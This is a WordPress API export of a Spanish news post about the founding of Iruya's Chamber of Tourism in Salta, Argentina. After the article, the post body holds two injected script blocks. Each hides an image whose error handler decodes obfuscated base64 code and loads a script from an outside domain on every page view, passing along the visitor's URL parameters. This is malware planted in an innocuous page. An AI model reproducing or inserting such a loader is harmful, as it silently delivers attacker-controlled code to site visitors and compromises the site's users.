{"id":1568,"date":"2022-09-30T19:12:55","date_gmt":"2022-09-30T22:12:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1568"},"modified":"2025-08-14T00:34:02","modified_gmt":"2025-08-14T03:34:02","slug":"iruya-apuntala-su-crecimiento-y-conforma-su-camara-de-turismo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1568","title":{"rendered":"Iruya apuntala su crecimiento y conforma su C\u00e1mara de Turismo"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#c3113d\"><em>Es clave para apuntalar el trabajo en conjunto entre los sectores p\u00fablico y privado en la regi\u00f3n tur\u00edstica Quebradas Andinas.<\/em><\/h3>\n\n\n\n<p>Uno de los objetivos planteados en el plan estrat\u00e9gico Liderar es consolidar la asociaci\u00f3n estrat\u00e9gica entre los sectores que forman parte de la actividad tur\u00edstica, un camino que tiene continuidad en Salta desde hace d\u00e9cadas. En este marco, se dio un marco institucional a los emprendimientos de Iruya con la conformaci\u00f3n de la C\u00e1mara de Turismo. &nbsp;<\/p>\n\n\n\n<p>&nbsp;\u201cCon el objetivo de fortalecer a Iruya como destino tur\u00edstico sustentable, seguro y profesional, conformamos la C\u00e1mara de Turismo\u201d indic\u00f3 Facundo Assaf, gerente General del Hotel Iruya; asimismo, destac\u00f3 el apoyo del Ministerio de Turismo y Deportes que acompa\u00f1\u00f3 el trabajo para lograr la creaci\u00f3n de la primera C\u00e1mara sectorial.<\/p>\n\n\n\n<p>Por su parte, el titular de la&nbsp;<strong>cartera Tur\u00edstica Mario Pe\u00f1a&nbsp;<\/strong>resalt\u00f3 la importancia de este acto que demuestra el crecimiento del turismo en las regiones salte\u00f1as y la confianza de los prestadores, \u201cal ser el turismo una pol\u00edtica de Estado, permite a quienes trabajan en diversos sectores crecer y prestar cada vez mejores servicios\u201d; asimismo, indic\u00f3 que desde el Ministerio se realiza una tarea cotidiana propiciando la uni\u00f3n de los prestadores y el fortalecimiento de los v\u00ednculos entre los sectores p\u00fablico y privado.<\/p>\n\n\n\n<p>El acta fue firmada por doce prestadores de los siguientes rubros: hoteler\u00eda, gastronom\u00eda, artesan\u00edas y transporte. La C\u00e1mara en este primer periodo est\u00e1 presidida por Mar\u00eda Fernanda Alcoba Ruiz y en la vicepresidencia, Teresa Gladys Cruz.&nbsp;&nbsp;<\/p>\n\n\n\n<p>El presidente de la C\u00e1mara de Turismo de Salta, Gustavo Di M\u00e9cola se\u00f1al\u00f3 que se \u201ctrata de una excelente noticia, no hay duda que el futuro exitoso del turismo en Salta est\u00e1 ligado primero al profesionalismo\u201d e indic\u00f3 que \u201cla mejor forma de canalizar las necesidades del sector, es articular con el sector p\u00fablico es a trav\u00e9s de las c\u00e1maras\u201d.&nbsp;&nbsp;<\/p>\n\n\n\n<p>Iruya tiene un crecimiento sostenido en el n\u00famero de visitantes, en 2018 hubo un 53% anual de ocupaci\u00f3n, \u00edndice que creci\u00f3 5 en 2019. En tanto en 2021, luego del dif\u00edcil a\u00f1o de la pandemia, la ocupaci\u00f3n anual alcanz\u00f3 un 66%.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/iruya-apuntala-su-crecimiento-y-conforma-su-camara-de-turismo-85196\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Es clave para apuntalar el trabajo en conjunto entre los sectores p\u00fablico y privado en la regi\u00f3n tur\u00edstica Quebradas Andinas. Uno de los objetivos planteados en el plan estrat\u00e9gico Liderar es consolidar la asociaci\u00f3n estrat\u00e9gica entre los sectores que forman parte de la actividad tur\u00edstica, un camino que tiene continuidad en Salta desde hace d\u00e9cadas. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1569,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18],"tags":[],"class_list":{"0":"post-1568","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1568"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1568"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1568\/revisions"}],"predecessor-version":[{"id":7330,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1568\/revisions\/7330"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1569"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1568"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1568"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1568"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}